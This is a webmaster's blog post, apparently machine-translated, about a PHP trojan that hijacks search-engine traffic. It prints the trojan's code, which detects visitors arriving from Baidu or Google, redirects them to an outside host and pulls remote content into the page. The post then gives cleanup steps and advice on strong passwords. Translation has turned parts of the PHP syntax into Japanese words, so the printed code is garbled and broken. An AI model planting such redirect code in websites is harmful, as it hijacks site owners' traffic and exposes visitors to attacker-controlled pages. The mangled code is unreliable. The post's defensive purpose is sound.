検索エンジンのトラフィックを迂回させる PHP トロイの木馬の導入と防止

検索エンジンのトラフィックを迂回させる PHP トロイの木馬の導入と防止

普段はアクセス数が多くPVも高いWebサイトなのに、ある日突然PVが下がり始めたら、Webサイトのコンテンツに問題があるだけでなく、トロイの木馬に感染していないか検討する必要があります。実際、検索エンジンのトラフィックを迂回させるPHPトロイの木馬は以前からありました。簡単に言うと、アクセストラフィックが検索エンジンから来ている場合、相手方のWebサイトのファイルを自動的に取得し、ユーザーに自分のWebサイトが見られないようにするのです。

私のウェブサイトが最近このような攻撃を受けたため、このコードを共有して、このような攻撃に対して依然として警戒する必要があるウェブマスター、特に PHP プログラムを使用してウェブサイトを構築している方々に何らかのインスピレーションを与えたいと考えています。過去のデータによると、このようなトロイの木馬は珍しいものではありません。1年前、あるいは数年前にも存在していたようですが、現在その影響は以前ほど大きくないかもしれません。

以下は、検索エンジンのトラフィックを転送する攻撃コードです。

エラー報告(E_ERROR);

ヘッダー('content-Type: text/html; charset=gb2312');

$come_from="baidu.com#google.com.hk#soso.com#sogou.com#cache.baidu.com#google.cn";

$referer = Split("#",$come_from);

foreach($referer を $v として){

if(strstr($_SERVER['HTTP_REFERER'],$v))

{

ヘッダー("場所: ".'http://www.abc.com/3/nb.html?'.$_SERVER['SERVER_NAME']);

}

}

echo file_get_contents('http://www.abc.com//xx/dn2.php');

?>

コードは非常にシンプルです。アクセス元が検索エンジンの場合、以下に説明する PHP ファイルと HTML ファイルを配置するため、ユーザーが期待する結果が得られません。もちろん、サーバーごとに設定は異なり、そのようなファイルをアップロードしても実行が制限されるサーバーもありますが、問題があるので、それを解決するのが次のステップです。

以下では私の解決策について簡単に説明します。今後同様の状況に遭遇する他の人に役立つことを願っています。

最初のステップは、当然ながら、類似の PHP ファイルを削除することです。これらの PHP ファイルには固定の名前はありませんが、すべてルート ディレクトリにあるため、簡単に見つけることができます。見慣れないファイルを削除するだけです。削除した後は興奮しないでください。まず他のディレクトリに移動して、類似した見慣れないファイルを探してください。見つかった見慣れないファイルを開いて、問題がある場合は直接削除してください。

2 番目のステップは、よく使用されるシステム PHP ファイルを引き続き調べて、これらのファイルが最近変更されたかどうかを確認することです。変更されている場合は、それらをダウンロードし、最初に表示された dv.php など、以前に表示された奇妙な PHP ファイル名を探します。これで、dv.php を検索して、このように変更されたかどうかを確認できます。また、他のディレクトリには通常、実際のトロイの木馬があります。

3番目のステップでは、360ウェブサイトセキュリティテストプラットフォームにアクセスできます。アップロードされたファイルが検証されたら、ウェブサイトが安全かどうかのテストを開始できます。一般的に、ウェブサイトが黒いリンクにリンクされている場合、または目に見えないテキストがある場合は、プロンプトが表示されるため、比較的簡単に使用できます。この機能は、ブラックリンクの検出に特に適しています。ブラックリンクは一般に隠されており、ウェブマスターが考え出すのが難しいためです。

4 番目のステップは、FTP アカウントのパスワード、Web サイトのバックエンド アドレス、Web サイトのバックエンド ログイン名、またはその他のパスワードなど、弱いパスワードを変更することです。7 文字または 8 文字のみなど、パスワードが弱すぎると思われる場合は、より難しいパスワードに変更することをお勧めします。弱いパスワードがスキャンされたために、多くの Web サイトがクラックされています。パスワードの長さを増やすことは、そのような Web サイトのクラックを防ぐのに役立ちます。

ここまで書いて、話は基本的に終わりです。ウェブサイトのセキュリティは緊急です。ウェブサイトのセキュリティ問題には常に注意を払う必要があります。注意を払わないと、ブラックリンクを張っている人たちがあなたを狙うでしょう。ウェブサイトのセキュリティを常に向上させることによってのみ、ハッキングを回避することができます。この記事は、Aibue.com (http://www.aibue.com) のウェブマスターによって作成されたものです。転載または共有する場合は、出典を明記してください。ご協力ありがとうございます。

原題: 検索エンジンのトラフィックを迂回させる PHP トロイの木馬の紹介と防止

キーワード: 検索エンジン、php トロイの木馬、dedecms、phpcm、ウェブマスター、ウェブサイト、ウェブサイトのプロモーション、収益化

<<:  ウェブサイトのナビゲーションを適切に最適化すると、SEOの最適化が容易になります。

>>:  オンラインプロモーションの目的は、ブランド構築に重点を置き、ユーザーの参加を増やすことです。

推薦する

サーバーの安定性がランキングに与える影響

サーバーの安定性はウェブサイトのランキングに直接影響します。これはSEOの重要な部分であり、SEOに...

Hostodo: 新しい NVMe シリーズ VPS の簡単なレビューで、Hostodo がどのようなものかを説明します

5年間運営してきたHostodoは、OVZシリーズを廃止し、ウェブサイトを刷新しました。今週、Hos...

伝統メディアによる今日頭条ボイコットはどんなシグナルを発しているのだろうか?

6月3日、「データマイニングに基づくパーソナライズされた情報推奨エンジン」を提供するアプリ「今日頭条...

翡翠ジュエリーの過去と現在:棚上げされたWeiboマーケティング計画

約3か月前、雲南省の翡翠電子商取引会社のCEOから、オンラインマーケティングプランの作成を依頼されま...

母子向けサイトの動向は?

今日の社会において最も重要な家族関係は何でしょうか?夫婦関係?親子関係?義母と嫁の関係?親子関係こそ...

エッジコンピューティングにおける高精度液体冷却の役割

インターネットが広く普及した初期の頃から今日のハイパーコネクテッド時代に至るまで、私たちが生成するデ...

小売業界におけるパブリッククラウドの情報セキュリティに関する議論

⚠️パブ​​リッククラウドのセキュリティインシデント⚠️過去 6 か月間に、小売業界ではパブリック ...

2019年のブラックフライデーに関する情報はあまりないので最後にまとめておきます

その年の感謝祭イベントからブラックフライデー、そして今日のサイバーマンデーまで、IDC業界全体では基...

中国高速航空、クラウドインフラ構築にAWSを全面採用

2019年4月11日、アマゾンウェブサービス(北京)有限公司(以下、「AWS」)は、中国高速航空有限...

江蘇省工業情報化部のチー・ユー副部長と代表団が華雲データグループを視察

3月6日、江蘇省党委メンバーで江蘇省工業情報化部の副部長である池宇氏とその代表団が調査と研究のため華...

上海警察は、最大300万ドル相当の省をまたいだオンライン詐欺事件を摘発した。

上海警察は8日、青浦市公安局が綿密な捜査を経て省市をまたぐインターネット詐欺事件を摘発し、機械設備販...

簡単な分析: 企業のウェブサイトの最適化には SEO 診断が必要ですか?

企業ウェブサイトは、企業がマーケティングを行う方法の 1 つです。企業のリーダーは、必然的に企業ウェ...

中国のクラウドコンピューティング価値マップ: 4つの都市が「クラウド第一層」階層にランクイン

最近、中国社会科学院金融経済研究所は、中国の「クラウドコンピューティング地図」を描いた報告書「クラウ...

ウェブサイトのキーワード難易度サイクルを正確に推定し、SEO注文のメリットを向上させる

SEO業務に従事するには、キーワード分析とサイクル予測という2つの能力を習得する必要があります。他の...